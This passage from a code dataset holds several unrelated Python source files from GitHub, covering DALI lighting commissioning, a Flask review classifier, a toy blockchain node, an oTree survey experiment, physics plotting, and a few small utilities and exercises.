completed=None, size=None):\n self.message = message\n self.completed = completed\n self.size = size\n\n def __str__(self):\n if self.message:\n return self.message\n if self.completed is not None and self.size is not None:\n return f\"Progress: {self.completed}/{self.size}\"\n\n\ndef QueryDeviceTypes(addr):\n \"\"\"Obtain a list of part 2xx device types supported by control gear\n \"\"\"\n r = yield QueryDeviceType(addr)\n if r.raw_value is None:\n raise DALISequenceError(\"No response to initial query\")\n if r.raw_value.as_integer < 254:\n return [r.raw_value.as_integer]\n if r.raw_value.as_integer == 254:\n return []\n assert r.raw_value.as_integer == 255\n last_seen = 0\n result = []\n while True:\n r = yield QueryNextDeviceType(addr)\n if not r.raw_value:\n raise DALISequenceError(\n \"No response to QueryNextDeviceType()\")\n if r.raw_value.as_integer == 254:\n if len(result) == 0:\n raise DALISequenceError(\n \"No device types returned by QueryNextDeviceType\")\n return result\n if r.raw_value.as_integer <= last_seen:\n # The gear is required to return device types in\n # ascending order, without repeats\n raise DALISequenceError(\"Device type received out of order\")\n result.append(r.raw_value.as_integer)\n\n\ndef QueryGroups(addr):\n \"\"\"Obtain the group membership of control gear.\n\n Returns a set of integers.\n \"\"\"\n groups = set()\n g0 = yield QueryGroupsZeroToSeven(addr)\n if g0.raw_value is None:\n raise DALISequenceError(\"No response reading groups zero to seven\")\n if g0.raw_value.error:\n raise DALISequenceError(\"Framing error reading groups zero to seven\")\n g1 = yield QueryGroupsEightToFifteen(addr)\n if g1.raw_value is None:\n raise DALISequenceError(\"No response reading groups eight to fifteen\")\n if g1.raw_value.error:\n raise DALISequenceError(\"Framing error reading groups eight to fifteen\")\n g = g1.raw_value + g0.raw_value\n for i in range(0, 16):\n if g[i]:\n groups.add(i)\n return groups\n\n\ndef SetGroups(addr, groups):\n \"\"\"Set the group membership of control gear.\n\n groups is a set of integers in the range 0..15\n \"\"\"\n if isinstance(addr, Short) or isinstance(addr, int):\n existing = yield from QueryGroups(addr)\n for i in groups - existing:\n yield AddToGroup(addr, i)\n for i in existing - groups:\n yield RemoveFromGroup(addr, i)\n else:\n # Can't read from multiple devices: must write every group\n for i in range(0, 16):\n if i in groups:\n yield AddToGroup(addr, i)\n else:\n yield RemoveFromGroup(addr, i)\n\n\ndef _find_next(low, high):\n yield SetSearchAddrH((high >> 16) & 0xff)\n yield SetSearchAddrM((high >> 8) & 0xff)\n yield SetSearchAddrL(high & 0xff)\n\n r = yield Compare()\n\n if low == high:\n if r.value is True:\n return \"clash\" if r.raw_value.error else low\n return\n\n if r.value is True:\n midpoint = (low + high) // 2\n res = yield from _find_next(low, midpoint)\n if res is not None:\n return res\n return (yield from _find_next(midpoint + 1, high))\n\n\ndef Commissioning(available_addresses=None, readdress=False,\n dry_run=False):\n \"\"\"Assign short addresses to control gear\n\n If available_addresses is passed, only the specified addresses\n will be assigned; otherwise all short addresses are considered to\n be available.\n\n if \"readdress\" is set, all existing short addresses will be\n cleared; otherwise, only control gear that is currently\n unaddressed will have short addresses assigned.\n\n If \"dry_run\" is set then no short addresses will actually be set.\n This can be useful for testing.\n \"\"\"\n if available_addresses is None:\n available_addresses = list(range(64))\n else:\n available_addresses = list(available_addresses)\n\n if readdress:\n if dry_run:\n yield progress(message=\"dry_run is set: not deleting existing \"\n \"short addresses\")\n else:\n yield DTR0(255)\n yield SetShortAddress(Broadcast())\n else:\n # We need to know which short addresses are already in use\n for a in range(0, 64):\n if a in available_addresses:\n in_use = yield QueryControlGearPresent(Short(a))\n if in_use.value:\n available_addresses.remove(a)\n yield progress(\n message=f\"Available addresses: {available_addresses}\")\n\n yield Terminate()\n yield Initialise(broadcast=True if readdress else False)\n\n finished = False\n # We loop here to cope with multiple devices picking the same\n # random search address; when we discover that, we\n # re-randomise and begin again. Devices that have already\n # received addresses are unaffected.\n while not finished:\n yield Randomise()\n # Randomise can take up to 100ms\n yield sleep(0.1)\n\n low = 0\n high = 0xffffff\n\n while low is not None:\n yield progress(completed=low, size=high)\n low = yield from _find_next(low, high)\n if low == \"clash\":\n yield progress(message=\"Multiple ballasts picked the same \"\n \"random address; restarting\")\n break\n if low is None:\n finished = True\n break\n yield progress(\n message=f\"Ballast found at address {low:#x}\")\n if available_addresses:\n new_addr = available_addresses.pop(0)\n if dry_run:\n yield progress(\n message=\"Not programming short address \"\n f\"{new_addr} because dry_run is set\")\n else:\n yield progress(\n message=f\"Programming short address {new_addr}\")\n yield ProgramShortAddress(new_addr)\n r = yield VerifyShortAddress(new_addr)\n if r.value is not True:\n raise ProgramShortAddressFailure(new_addr)\n else:\n yield progress(\n message=\"Device found but no short addresses left\")\n yield Withdraw()\n if low < high:\n low = low + 1\n else:\n low = None\n finished = True\n yield Terminate()\n yield progress(message=\"Addressing complete\")\n","repo_name":"sde1000/python-dali","sub_path":"dali/sequences.py","file_name":"sequences.py","file_ext":"py","file_size_in_byte":8138,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"61"} +{"seq_id":"17610882766","text":"from flask import Flask, request, jsonify\nimport pickle\nfrom sklearn.naive_bayes import MultinomialNB\nimport jieba\nimport pandas as pd\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport json\nfrom openpyxl import Workbook, load_workbook\n\n# 读取模型\nwith open('data/classifiers.pickle', 'rb') as f:\n classifiers = pickle.load(f)\n# 读取vectorizer对象\nwith open('data/vectorizer.pickle', 'rb') as f:\n vectorizer = pickle.load(f)\n# 读取分词表\nwith open('data/stopwords.txt', 'r', encoding='utf-8') as f:\n stopwords = f.read().splitlines()\n\n\napp = Flask(__name__)\nmp = {\"味道好\": 2, \"味道差\": 3, \"态度好\": 4, \"态度差\": 5, \"卫生状态\": 6, \"不新鲜\": 7, \"其他\": 8}\nlabels = [\"味道好\", \"味道差\", \"态度好\", \"态度差\", \"卫生状态\", \"不新鲜\", \"其他\"]\n\n# 使用模型分析数据 将分析的结果放入data/text.xlsx文件内保存,并返回对应text的json\ndef information_analysis_func(text):\n copy_text = text\n text = ' '.join(jieba.cut(text))\n text = ' '.join([word for word in text.split() if word not in stopwords])\n new_X = vectorizer.transform([text])\n js = {\"text\": copy_text, \"labels\": []}\n data = [copy_text]\n flg = False\n for label, clf in classifiers.items():\n proba = clf.predict_proba(new_X)[0, 1]\n # 如果概率大于0.5,就放入json里面\n print(f'{label}的概率为{proba:.2f}')\n flag = proba >= 0.5\n if flag:\n js[\"labels\"].append(label)\n flg = True\n data.append(1)\n else:\n data.append(0)\n if not flg:\n js[\"labels\"].append(\"其他\")\n data.append(1)\n else:\n data.append(0)\n # 打开现有的XLSX文件\n workbook = load_workbook('./data.xlsx')\n worksheet = workbook.active\n # 写入文件\n worksheet.append(data)\n # 保存文件\n workbook.save('./data.xlsx')\n return js\n\ndef get_information_func(label):\n flag = False\n if label == \"全部\":\n flag = True\n # 打开Excel文件\n workbook = load_workbook('data.xlsx')\n # 选择第一个工作表\n data = []\n worksheet = workbook.active\n # 获取行数和列数\n max_row = worksheet.max_row\n for i in range(2, max_row+1):\n if flag or worksheet.cell(row=i, column=mp[label]).value == 1:\n js = {\"text\": worksheet.cell(row=i, column=1).value, \"labels\": []}\n for key, value in mp.items():\n if worksheet.cell(row=i, column=value).value == 1:\n js[\"labels\"].append(key)\n data.append(js)\n return data\n\n\n\n# 测试\n# print(information_analysis(\"这家店味道很好,服务员态度也很好,服务周到,下次还来\"))\n@app.route('/test', methods=['POST'])\ndef test():\n return jsonify([{'text': '这家店味道很好,服务员态度也很好,服务周到,下次还来', 'labels': ['味道好', '态度好']}, {'text': '这家店味道很好,服务员态度也很好,服务周到,下次还来', 'labels': ['味道好', '态度好']}, {'text': '这家店味道很好,服务员态度也很好,服务周到,下次还来', 'labels': ['味道好', '态度好']}])\n\n@app.route('/information_analysis', methods=['POST'])\ndef information_analysis():\n # 在这里编写信息分析的代码\n data = request.get_json()\n data = information_analysis_func(data[\"text\"])\n print(data)\n return jsonify(data)\n\n@app.route('/get_information', methods=['POST'])\ndef get_information():\n # 在这里编写获取信息的代码\n data = request.get_json()\n result = get_information_func(data[\"label\"])\n return jsonify(result)\n\n@app.route('/get_information', methods=['GET'])\ndef get_information_number():\n # 打开Excel文件\n workbook = load_workbook('data.xlsx')\n # 选择第一个工作表\n data = []\n worksheet = workbook.active\n # 获取行数和列数\n max_row = worksheet.max_row\n # 全部数量\n data.append(max_row-1)\n for i in labels:\n data.append(0)\n for i in range(2, max_row+1):\n for j in range(len(labels)):\n if worksheet.cell(row=i, column=mp[labels[j]]).value == 1:\n data[j+1] = data[j+1]+1\n return jsonify({\"data\": data})\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=8989)\n","repo_name":"hyy-Chen/Multi-label-Categorization-Model-for-Restaurant-Evaluation-Based-on-natural-language-processing","sub_path":"git/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12043852443","text":"\nimport os\n\ndef wsgiConfig(domain):\n\n wsgiLoad=open(\"/etc/apache2/mods-available/wsgi.load\",\"w\")\n wsgiLoad.writelines(\"LoadModule wsgi_module /usr/lib/apache2/modules/mod_wsgi.so\\n\")\n wsgiLoad.close()\n return True\n\nif __name__==\"__main__\":\n wsgiConfig(\"pucsd.online\")\n\n","repo_name":"surajbhosale409/software-comprehension","sub_path":"scripts/serverConf/scripts/modWSGI/modWSGI.py","file_name":"modWSGI.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8523680788","text":"from flask import Flask, jsonify,request\r\nfrom model.blockchain import Blockchain\r\nfrom model.hospital import Hospital\r\nfrom uuid import uuid4\r\n\r\napp = Flask(__name__)\r\n\r\n#Creating a blockchain\r\nblockchain=Blockchain()\r\n\r\n#Creating hospital\r\nhospital=Hospital()\r\n\r\n#creating an address for the node on the port 5000\r\nnode_address=str(uuid4()).replace('-','')\r\n\r\n#Mining a new block\r\n@app.route('/mine_block',methods=['GET'])\r\ndef mine_block():\r\n previous_block=blockchain.get_previous_block()\r\n previous_proof=previous_block['proof']\r\n proof=blockchain.proof_of_work(previous_proof)\r\n previous_hash=blockchain.hash(previous_block)\r\n block=blockchain.create_block(proof,previous_hash)\r\n response={'message':'Congratulations, you just mined a block!',\r\n 'index':block['index'],\r\n 'timestamp':block['timestamp'],\r\n 'proof':block['proof'],\r\n 'previous_hash':block['previous_hash'],\r\n 'transactions':block['transactions']}\r\n return jsonify(response), 200\r\n\r\n@app.route('/get_chain',methods=['GET'])\r\ndef get_chain():\r\n response={'chain':blockchain.chain,\r\n 'length':len(blockchain.chain)}\r\n return jsonify(response), 200\r\n\r\n@app.route('/is_valid',methods=['GET'])\r\ndef is_valid():\r\n is_valid=blockchain.is_chain_valid(blockchain.chain)\r\n if is_valid:\r\n return jsonify({'message':'All good.. The blockchain is valid.)'}),200\r\n else:\r\n return jsonify({'message':'Houston, we have a problem. The Blockchain is not valid'}),200\r\n \r\n#connecting all the nodes \r\n@app.route('/connect_node',methods=['POST'])\r\ndef connect_node():\r\n json=request.get_json()\r\n nodes=json.get('nodes')\r\n if nodes is None:\r\n return 'No node',400\r\n for node in nodes:\r\n blockchain.add_node(node)\r\n response={'message':'All the nodes are connected now. It contains the following nodes:',\r\n 'total_nodes':list(blockchain.nodes)}\r\n return jsonify(response),201\r\n\r\n@app.route('/replace_chain',methods=['GET'])\r\ndef replace_chain():\r\n is_chain_replaced=blockchain.replace_chain()\r\n if is_chain_replaced==True:\r\n return jsonify({'message':'The nodes had different chains so the chain was replaced by the longest one.',\r\n 'new_chain':blockchain.chain}),200\r\n else:\r\n return jsonify({'message':'All good. The chain is the largest one.',\r\n 'actual_chain':blockchain.chain}),200\r\n \r\napp.run(host='0.0.0.0',port=5003)","repo_name":"Praveen-CloudLearn/blockchain","sub_path":"Hospital_controller_5003.py","file_name":"Hospital_controller_5003.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42889420772","text":"from otree.api import (\n models,\n widgets,\n BaseConstants,\n BaseSubsession,\n BaseGroup,\n BasePlayer,\n Currency as c,\n currency_range,\n)\nimport itertools\nimport random\nfrom django.utils.safestring import mark_safe\n\nauthor = 'Anne Mensing, Julia Lauten, Kateryna Kuian, Moritz Gottschling'\n\ndoc = \"\"\"\nThis is the source code for the experiment for our bms seminar paper 2020.\n\"\"\"\n\n\nclass Constants(BaseConstants):\n name_in_url = 'bms_experiment'\n players_per_group = None\n num_rounds = 2\n\n labels = {\n 'age': 'Age:',\n 'gender': 'Gender:',\n 'installed': 'Have you installed the Corona-Warn-App?',\n\n 'competence': 'The app will be able to keep my personal data secured.',\n 'competence_neg': 'The app lacks the necessary competence to protect my data.',\n\n 'benevolence': 'The app was made to collect my personal data.',\n 'benevolence_neg': 'The app acts in my interest.',\n\n 'no_central_entity': 'The app does not store my personal data on a central server.',\n 'no_central_entity_neg': 'The personal data of mine is stored by the app on a central server.',\n 'anonymity': 'The app does not allow other users to access/view my personal data.',\n 'anonymity_neg': 'My personal data can be accessed/viewed by other users of the app.',\n 'no_tracking': 'The app will track my location and collect personal data on my phone.',\n 'no_tracking_neg': 'My location and personal data from my phone can not be collected by the '\n 'app.',\n 'unlinkabilty': 'The app prevents linking back the collected data to my person.',\n 'unlinkabilty_neg': 'Using the app it is possible to link the collected data back to my person.',\n\n 'activity': 'What does the app do while being active?',\n 'data_stored': 'What data does the app store?',\n 'warnings': 'When are warnings given?',\n 'infected': 'What happens when you had contact with an infected person?',\n\n 'understanding': 'Please rate your technical understanding of the Corona-Warn-App.',\n }\n\n m_choice_questions = {\n 'q1': {\n 'text': 'What do two phones that have the app installed exchange?',\n 'answers': {\n 'a1': 'They exchange GPS coordinates',\n 'a2': 'They exchange data about your person ',\n 'a3': 'They exchange randomly generated keys',\n 'a4': 'They exchange a key that is assigned to you after installation of the app ',\n 'a5': 'I am not sure',\n }\n },\n 'q2': {\n 'text': 'What data is stored centrally?',\n 'answers': {\n\n 'a1': 'Location data',\n 'a2': 'List of names of people infected',\n 'a3': 'Randomly generated keys of all users',\n 'a4': 'None of the above',\n 'a5': 'I am not sure',\n }\n },\n 'q3': {\n 'text': 'Which encounter would lead to a high risk assessment for the other person in case you test '\n 'positive within the following 14 days?',\n 'answers': {\n 'a1': 'Sitting next to this person on the bus for 2 hours',\n 'a2': 'Passing by this person with less than 1.5 meter distance between you ',\n 'a3': 'Sitting on opposite sides of the movie theater while watching a movie',\n 'a4': 'Meeting this person for coffee in a cafe for 1 hour',\n 'a5': 'I am not sure',\n }\n },\n 'q4': {\n 'text': 'What happens if you are classified as “high risk” in the Corona-Warn-App?',\n 'answers': {\n 'a1': 'The health department will contact you to ask about your symptoms and assess whether a '\n 'COVID-19 test is necessary',\n 'a2': 'Your key will be automatically uploaded to the server',\n 'a3': 'You will be quarantined for 14 days',\n 'a4': 'It will be upon you to take action',\n 'a5': 'I am not sure',\n }\n },\n }\n\n\nclass Subsession(BaseSubsession):\n def creating_session(self):\n # randomize to treatments\n # transparency_conditions = itertools.cycle(['no', 'brief', 'detailed'])\n for player in self.get_players():\n # player.participant.vars['tr'] = next(transparency_conditions)\n player.participant.vars['tr'] = 'unassigned'\n\n\nclass Group(BaseGroup):\n pass\n\n\ndef make_radio(label):\n return models.IntegerField(\n choices=[\n [1, mark_safe('Totally Disagree')],\n [2, mark_safe('Disagree')],\n [3, mark_safe('Undecided/Not sure')],\n [4, mark_safe('Agree')],\n [5, mark_safe('Totally Agree')],\n ],\n label=mark_safe(label),\n widget=widgets.RadioSelectHorizontal,\n )\n\n\ndef make_answer(label):\n return models.BooleanField(\n label=label,\n widget=widgets.CheckboxInput,\n blank=True\n )\n\n\ndef make_attentive():\n return models.StringField(\n choices=['red', 'orange', 'yellow', 'green', 'blue', 'purple', 'pink', 'white', 'gray', 'brown', 'black'],\n label='What was the color?'\n )\n\n\nclass Player(BasePlayer):\n # automatically selected\n trans_cond = models.StringField();\n # general information\n age = models.IntegerField(label=Constants.labels['age'])\n gender = models.IntegerField(\n choices=random.sample([\n [0, 'Female'],\n [1, 'Male'],\n [2, 'Diverse'],\n ], 3),\n max=99,\n min=0,\n widget=widgets.RadioSelectHorizontal\n )\n installed = models.BooleanField(label=Constants.labels['installed'], widget=widgets.RadioSelectHorizontal)\n # trust\n # competence\n competence = make_radio(Constants.labels['competence'])\n competence_neg = make_radio(Constants.labels['competence_neg'])\n # benevolence\n benevolence = make_radio(Constants.labels['benevolence'])\n benevolence_neg = make_radio(Constants.labels['benevolence_neg'])\n # integrity\n no_central_entity = make_radio(Constants.labels['no_central_entity'])\n no_central_entity_neg = make_radio(Constants.labels['no_central_entity_neg'])\n anonymity = make_radio(Constants.labels['anonymity'])\n anonymity_neg = make_radio(Constants.labels['anonymity_neg'])\n no_tracking = make_radio(Constants.labels['no_tracking'])\n no_tracking_neg = make_radio(Constants.labels['no_tracking_neg'])\n unlinkabilty = make_radio(Constants.labels['unlinkabilty'])\n unlinkabilty_neg = make_radio(Constants.labels['unlinkabilty_neg'])\n # understanding\n # perceived\n understanding = models.IntegerField(\n choices=[\n [1, 'No understanding'],\n [2, 'Limited understanding'],\n [3, 'Moderate understanding'],\n [4, 'Good understanding'],\n [5, 'Complete understanding'],\n ],\n label=mark_safe(Constants.labels['understanding']),\n widget=widgets.RadioSelect,\n )\n\n # actual\n q1_a1 = make_answer(Constants.m_choice_questions['q1']['answers']['a1'])\n q1_a2 = make_answer(Constants.m_choice_questions['q1']['answers']['a2'])\n q1_a3 = make_answer(Constants.m_choice_questions['q1']['answers']['a3'])\n q1_a4 = make_answer(Constants.m_choice_questions['q1']['answers']['a4'])\n q1_a5 = make_answer(Constants.m_choice_questions['q1']['answers']['a5'])\n\n q2_a1 = make_answer(Constants.m_choice_questions['q2']['answers']['a1'])\n q2_a2 = make_answer(Constants.m_choice_questions['q2']['answers']['a2'])\n q2_a3 = make_answer(Constants.m_choice_questions['q2']['answers']['a3'])\n q2_a4 = make_answer(Constants.m_choice_questions['q2']['answers']['a4'])\n q2_a5 = make_answer(Constants.m_choice_questions['q2']['answers']['a5'])\n\n q3_a1 = make_answer(Constants.m_choice_questions['q3']['answers']['a1'])\n q3_a2 = make_answer(Constants.m_choice_questions['q3']['answers']['a2'])\n q3_a3 = make_answer(Constants.m_choice_questions['q3']['answers']['a3'])\n q3_a4 = make_answer(Constants.m_choice_questions['q3']['answers']['a4'])\n q3_a5 = make_answer(Constants.m_choice_questions['q3']['answers']['a5'])\n\n q4_a1 = make_answer(Constants.m_choice_questions['q4']['answers']['a1'])\n q4_a2 = make_answer(Constants.m_choice_questions['q4']['answers']['a2'])\n q4_a3 = make_answer(Constants.m_choice_questions['q4']['answers']['a3'])\n q4_a4 = make_answer(Constants.m_choice_questions['q4']['answers']['a4'])\n q4_a5 = make_answer(Constants.m_choice_questions['q4']['answers']['a5'])\n\n # attentive\n attentive_1 = make_attentive()\n attentive_2 = make_attentive()\n # finished\n finished = models.BooleanField()\n","repo_name":"mogottsch/bms_experiment_2020","sub_path":"oTree/bms_experiment/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29315185813","text":"import pandas as pd\r\n\r\n\r\ndef get_stats(df):\r\n statistics = {}\r\n values = {}\r\n new_df = df.copy()\r\n mean = []\r\n max = []\r\n min = []\r\n\r\n numeric = ['Age', 'Annual_Premium', 'Vintage']\r\n\r\n for column in new_df:\r\n if column not in numeric:\r\n pass\r\n vals = new_df[column].value_counts(normalize=True)\r\n values[column] = vals\r\n\r\n for column in numeric:\r\n mean.append(new_df[column].mean())\r\n max.append(new_df[column].max())\r\n min.append(new_df[column].min())\r\n\r\n statistics['mean'] = mean\r\n statistics['max'] = max\r\n statistics['min'] = min\r\n\r\n statistics = pd.DataFrame.from_dict(statistics)\r\n\r\n statistics.index = numeric\r\n\r\n age_labels = ['< 30', '30 - 60 ', '60 +']\r\n premium_labels = ['< 10 000', '10 001 - 20 000', '20 001 - 40 000', '40 001 - 80 000', '80 001 - 100 000',\r\n '100 000 +']\r\n vintage_labels = ['< 100', '101 - 200', '200+']\r\n\r\n age_bins = [0, 31, 61, 200]\r\n premium_bins = [0, 10001, 20001, 40001, 80001, 100001, 99999999]\r\n vintage_bins = [0, 101, 201, 99999]\r\n\r\n new_df['Age'] = pd.cut(\r\n new_df['Age'], age_bins, labels=age_labels)\r\n new_df['Annual_Premium'] = pd.cut(\r\n new_df['Annual_Premium'], premium_bins, labels=premium_labels)\r\n new_df['Vintage'] = pd.cut(\r\n new_df['Vintage'], vintage_bins, labels=vintage_labels)\r\n\r\n for column in numeric:\r\n vals = new_df[column].value_counts(normalize=True)\r\n values[column] = vals\r\n\r\n return statistics, values\r\n","repo_name":"dcesarz/IO_Project_2","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"504858166","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndf = pd.read_csv('st-flux.csv')\ng1 = df['group1']\ng2 = df['group2']\ng3 = df['group3']\ng4 = df['group4']\ng5 = df['group5']\ng6 = df['group6']\ntemp = df['temp']\nx = df['arc_length']\n\ndfq = pd.read_csv('eq-flux.csv')\ng1q = dfq['group1']\ng2q = dfq['group2']\ng3q = dfq['group3']\ng4q = dfq['group4']\ng5q = dfq['group5']\ng6q = dfq['group6']\ntempq = dfq['temp']\n#x = df['arc_length']\n\ndfl = pd.read_csv('el-flux.csv')\ng1l = dfl['group1']\ng2l = dfl['group2']\ng3l = dfl['group3']\ng4l = dfl['group4']\ng5l = dfl['group5']\ng6l = dfl['group6']\ntempl = dfl['temp']\n#x = df['arc_length']\n\nf = g1 + g2 + g3 + g4 + g5 + g6\nfq = g1q + g2q + g3q + g4q + g5q + g6q\nfl = g1l + g2l + g3l + g4l + g5l + g6l\n\nfig, ax = plt.subplots()\n#ax.set_xscale('log')\n#ax.set_yscale('log')\nax.plot(x[:1000], f[:1000], label=r'Start-up')\nax.plot(x[:1000], fl[:1000], label=r'Early-life')\nax.plot(x[:1000], fq[:1000], label=r'Equilibrium')\nax.plot(0, 8.6e15, label=r'Fiorina et al.', marker='x')\n#ax.plot(ts[1:], gs1[1:], label=r'Step')\nax.set_xlabel(r'Radius [cm]')\nax.set_ylabel(r'Total neutron flux [# cm$^{-2}$ s$^{-1}$]')\nax.legend()\nplt.savefig('totalflux.png', dpi=400)\n\nfig, ax = plt.subplots()\n#ax.set_xscale('log')\n#ax.set_yscale('log')\nax.plot(x[:1000], temp[:1000], label=r'Start-up')\nax.plot(x[:1000], templ[:1000], label=r'Early-life')\nax.plot(x[:1000], tempq[:1000], label=r'Equilibrium')\n#ax.plot(ts[1:], gs1[1:], label=r'Step')\nax.set_xlabel(r'Radius [cm]')\nax.set_ylabel(r'Temperature [K]')\nax.legend()\n\nfig, ax = plt.subplots()\n#ax.set_xscale('log')\n#ax.set_yscale('log')\nax.plot(x[:1000], g1[:1000], label=r'Group 1')\nax.plot(x[:1000], g2[:1000], label=r'Group 2')\nax.plot(x[:1000], g3[:1000], label=r'Group 3')\nax.plot(x[:1000], g4[:1000], label=r'Group 4')\nax.plot(x[:1000], g5[:1000], label=r'Group 5')\nax.plot(x[:1000], g6[:1000], label=r'Group 6')\n#ax.plot(ts[1:], gs1[1:], label=r'Step')\nax.set_xlabel(r'Radius [cm]')\nax.set_ylabel(r'Neutron group flux [# cm$^{-2}$ s$^{-1}$]')\nax.legend()\nplt.savefig('stflux.png', dpi=400)\n\nfig, ax = plt.subplots()\n#ax.set_xscale('log')\n#ax.set_yscale('log')\nax.plot(x[:1000], g6[:1000], label=r'Start-up')\nax.plot(x[:1000], g6l[:1000], label=r'Early-life')\nax.plot(x[:1000], g6q[:1000], label=r'Equilibrium')\n#ax.plot(ts[1:], gs1[1:], label=r'Step')\nax.set_xlabel(r'Radius [cm]')\nax.set_ylabel(r'Neutron group 6 flux [# cm$^{-2}$ s$^{-1}$]')\nax.legend()\nplt.savefig('grp6flux.png', dpi=400)\n","repo_name":"arfc/2019-park-global","sub_path":"data/flux-plotter.py","file_name":"flux-plotter.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1176559233","text":"#\n# @lc app=leetcode.cn id=40 lang=python3\n#\n# [40] 组合总和 II\n#\n\nfrom typing import List\n\n# @lc code=start\n\n\nclass Solution:\n def combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:\n nums = sorted(candidates)\n paths = []\n path = []\n self.helper(nums, 0, paths, path, target)\n return paths\n\n def helper(self, nums, start, paths, path, target):\n\n if target < 0:\n return\n\n if target == 0:\n paths.append(path[:])\n return\n\n for i, num in enumerate(nums[start:], start):\n if i > start and num == nums[i-1]:\n continue\n path.append(num)\n self.helper(nums, i+1, paths, path, target-num)\n if len(path) > 0:\n path.pop()\n if target - num < 0:\n break\n\n\nif __name__ == \"__main__\":\n nums = [10, 1, 2, 7, 6, 1, 5]\n target = 8\n\n s = Solution()\n paths = s.combinationSum2(nums, target)\n print(paths)\n\n# @lc code=end\n","repo_name":"labusi/oj-problems","sub_path":"leetcode/python/40.组合总和-ii.py","file_name":"40.组合总和-ii.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"41193087943","text":"import FWCore.ParameterSet.Config as cms\n\ntrackerClusterCheckDefault = cms.EDProducer('ClusterCheckerEDProducer',\n doClusterCheck = cms.bool(True),\n MaxNumberOfCosmicClusters = cms.uint32(400000),\n ClusterCollectionLabel = cms.InputTag('siStripClusters'),\n MaxNumberOfPixelClusters = cms.uint32(40000),\n PixelClusterCollectionLabel = cms.InputTag('siPixelClusters'),\n cut = cms.string('strip < 400000 && pixel < 40000 && (strip < 50000 + 10*pixel) && (pixel < 5000 + 0.1*strip)'),\n silentClusterCheck = cms.untracked.bool(False),\n mightGet = cms.optional.untracked.vstring\n)\n","repo_name":"cms-sw/cmssw-cfipython","sub_path":"RecoTracker/TkSeedGenerator/trackerClusterCheckDefault_cfi.py","file_name":"trackerClusterCheckDefault_cfi.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6323155937","text":"from enum import unique\nfrom sqlalchemy import Table, Column, Integer, String, ForeignKey, TIMESTAMP\nfrom src.users.entities.user import User\n\nclass SQLAlchemyUsersRepository():\n\n def __init__(self, sqlalchemy_client, test = False):\n\n self.client = sqlalchemy_client\n self.session_factory = sqlalchemy_client.session_factory\n self.test = test\n\n table_name = \"Users\"\n\n if test:\n table_name += \"_test\"\n\n self.users_table = Table(\n table_name,\n sqlalchemy_client.mapper_registry.metadata,\n Column(\"id\", Integer, primary_key = True),\n Column(\"name\", String(50)),\n Column(\"email\", String(255)),\n Column(\"password\", String(255)),\n Column(\"role\", String(25)),\n Column(\"shipping_address\", String(255)),\n Column(\"public_id\", String(50), unique=True),\n )\n\n sqlalchemy_client.mapper_registry.map_imperatively(User, self.users_table)\n\n def get_users(self):\n \n with self.session_factory() as session:\n \n users = session.query(User).all()\n return users\n\n\n def create_user(self, user):\n\n with self.session_factory() as session:\n\n session.add(user)\n session.commit()\n\n return user\n \n def get_user(self, id):\n \n with self.session_factory() as session:\n\n user = session.query(User).filter_by(id = id).first()\n return user\n\n def update_user(self, id, fields):\n \n with self.session_factory() as session:\n\n session.query(User).filter_by(id = id).update(fields)\n session.commit()\n \n user = session.query(User).filter_by(id = id).first()\n return user\n\n def get_user_by_email(self, email):\n with self.session_factory() as session:\n\n user = session.query(User).filter_by(email = email).first()\n return user\n\n \n def hard_delete_user(self, id):\n\n with self.session_factory() as session:\n\n user = session.query(User).get(id)\n session.delete(user)\n session.commit()\n\n def hard_delete_all_users(self):\n\n if self.test:\n\n with self.session_factory() as session:\n \n session.query(User).delete()\n session.commit()\n \n def drop_users_table(self):\n\n if self.test:\n self.client.drop_table(self.users_table)","repo_name":"DantexInferno/basic-flask-ecommerce-jwt-auth","sub_path":"ecommerce-service/src/users/repositories/sqlalchemy_users_repository.py","file_name":"sqlalchemy_users_repository.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8959482307","text":"# First solution. Brute force. Correct, but times out.\nclass NumMatrixFirstAttempt(object):\n\n def __init__(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n \"\"\"\n \n self.data = matrix\n \n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\"\n :type row1: int\n :type col1: int\n :type row2: int\n :type col2: int\n :rtype: int\n \"\"\"\n total = 0\n \n for i in range(row1, row2+1):\n for j in range(col1, col2+1):\n total += self.data[i][j]\n \n return total\n\n\nclass NumMatrixImproved(object):\n\n def __init__(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n \"\"\"\n \n y_len = len(matrix) + 1\n x_len = len(matrix[0]) + 1\n \n data = []\n for y in range(y_len):\n data.append([])\n for x in range(x_len):\n data[y].append(0)\n \n self.data = data\n \n for y in range(1,y_len):\n for x in range(1,x_len):\n self.data[y][x] = matrix[y-1][x-1] + self.data[y-1][x] + self.data[y][x-1] - self.data[y-1][x-1]\n \n # print(self.data)\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\"\n :type row1: int\n :type col1: int\n 